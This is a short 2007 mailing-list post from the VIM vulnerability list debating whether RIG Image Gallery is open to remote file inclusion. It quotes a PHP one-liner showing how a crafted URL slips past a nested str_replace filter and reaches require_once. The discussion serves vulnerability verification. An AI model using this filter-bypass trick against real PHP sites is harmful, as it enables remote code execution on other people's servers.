[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
George A. Theall
theall at tenablesecurity.com
Tue Jul 31 13:26:39 UTC 2007
On 07/31/07 11:09, ascii wrote:
> George A. Theall wrote:
>> But regardless, the str_replace() later on in rig_check_src_file()
>> would certainly void the possibility of a remote file include attack.
>
> I'm not saying that the product is vulnerable but that this statement
> is completely flawed,
...
> php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".",
> str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
> http://www.tin.it/
You're right, of course. But along with the register_globals check it
does prevent the example exploit from working.
George
--
theall at tenablesecurity.com
More information about the VIM
mailing list